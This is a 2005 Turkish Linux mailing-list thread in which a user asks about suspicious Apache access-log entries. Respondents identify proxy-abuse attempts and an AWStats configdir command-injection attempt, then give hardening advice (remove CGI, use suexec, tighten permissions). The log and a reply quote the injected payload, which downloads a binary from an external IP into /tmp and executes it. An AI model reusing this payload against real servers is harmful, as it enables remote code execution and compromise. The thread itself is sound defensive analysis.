From: Savas SAGDIC (war@truvalinux.org)
Date: Fri 30 Dec 2005 - 18:01:17 EET
Suan tehlikeli bir durumunuz gorunmuyor.
Sisteminizden cgi destegini tamamen kaldirmanizi oneririm.
CGI gerekli ise apache ye Suexec destegi vermelisiniz ve cgi porgramlarini
nobody yetkisiyle calistirmalisiniz.
Ssteminize herhangi bir yetki ile erisebilen herkes directory list
alabilir! permision larinizi dikkatli ayarlamalisiniz.
webserver apache yetkisi ile calisiyorsa suexec vermediyseniz cgi uzerinden
erisen kiside apache yetkisine sahip olur
sistemde bircok yere ulasabilir. Web alaninizda dosya olusturma degistirme
ve calistirma yetkilerini kisiye teslim etmis olursunuz.
nobody yetkisi olan kiside tmp dizinlerinde herseyi yapabilir ve diger
bircok dizin listesine ulasabilir.
yapmaniz gerekenler tamamen sizin guvenlik prensiplerinize kalmis!
Savas SAGDIC
PS :
>Selamlar,
>Evet son satirda bir saldiri var.
>Awstats da n kaynaklanan bir bug i kullanarak bi seyler yapmayi denemis
>85.47.41.122 IP sini kullanan kisi.
>echo; echo YYY; cd /tmp;wget 209.136.48.69/mirela; chmod +x mirela;
>./mirela; echo YYY; echo
>komuyunu calistirmis.
>Bu mirela programi sizin sunucunuzda bir socket aciyor ve ona disardan
>baglanilmasina imkan sagliyor olabilir.
>Google da wget + mirela diye aratirsaniz bir cok link var bu konuda.
>Iyi calismalar dilerim.
>
>N. Ersen SISECI
>EnderUNIX Donem Lideri
>http://www.enderunix.org
----- Original Message -----
From: "Ali Metin" <siyisoy@hotmail.com>
To: <linux@liste.linux.org.tr>
Sent: Friday, December 30, 2005 5:18 PM
Subject: Re: [Linux] Acces_log girdisi
| Su anda sistemim guvende degil mi? (awstats.pl diye bi dosya olmadigindan)
Yoksa baska bir tedbir almali miyim?
|
|
|
|
| ------------------------------------------------------------------------------
|
| From: "Savas SAGDIC" <war@truvalinux.org>
| Reply-To: linux@liste.linux.org.tr
| To: <linux@liste.linux.org.tr>
| Subject: Re: [Linux] Acces_log girdisi
| Date: Fri, 30 Dec 2005 17:02:54 +0200
| >Selam,
| >birisi yada birileri web serverinizdan proxy olarak faydalanmaya
calismis
| >son satirdada cgi daki bir aciktan faydalanmaya calisilmis ama cgi-bin
| >altinda awstats.pl olmadigindan 404 cevabi donmus gorunuyor
| >!benim kendi yorumum!
| >komutu url decode ederseniz acik yada request hakkinda daha ayrintili
bilgi
| >edinilebilir.
| >kolay gelsin.
| >
| >Savas SAGDIC
| >
| >----- Original Message -----
| >From: "Ali Metin" <siyisoy@hotmail.com>
| >To: <linux@liste.linux.org.tr>
| >Sent: Friday, December 30, 2005 4:38 PM
| >Subject: [Linux] Acces_log girdisi
| >
| >
| >| 64.233.44.234 - - [30/Dec/2005:16:25:43 +0200] "HEAD
http://www.sun.com/
| >HTTP/1.0" 403 - "-" "Mozilla/5.0 ( Windows; U; Windows 2003; DigiExt )
| >| 67.22.128.104 - - [30/Dec/2005:12:33:51 +0200] "GET
http://login.yahoo.com
| >HTTP/1.0" 403 3931 "-" "-"
| >| 85.47.41.122 - - [29/Dec/2005:05:14:08 +0200] "GET
|
>/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
| >HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
| >|
| >|
| >|
| >| Apache access loglarinda yukaridaki satirlar var. Ne manaya geliyor?
| >| Son satirda bir saldiri var di mi?
| >|
| >
| >
|
>--------------------------------------------------------------------------------
| >
| >
| >_______________________________________________
| >Linux mailing list
| >Linux@liste.linux.org.tr
| >http://liste.linux.org.tr/mailman/listinfo/linux
| >
| >_______________________________________________
| >Linux mailing list
| >Linux@liste.linux.org.tr
| >http://liste.linux.org.tr/mailman/listinfo/linux
|
--------------------------------------------------------------------------------
_______________________________________________
Linux mailing list
Linux@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux
_______________________________________________
Linux mailing list
Linux@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux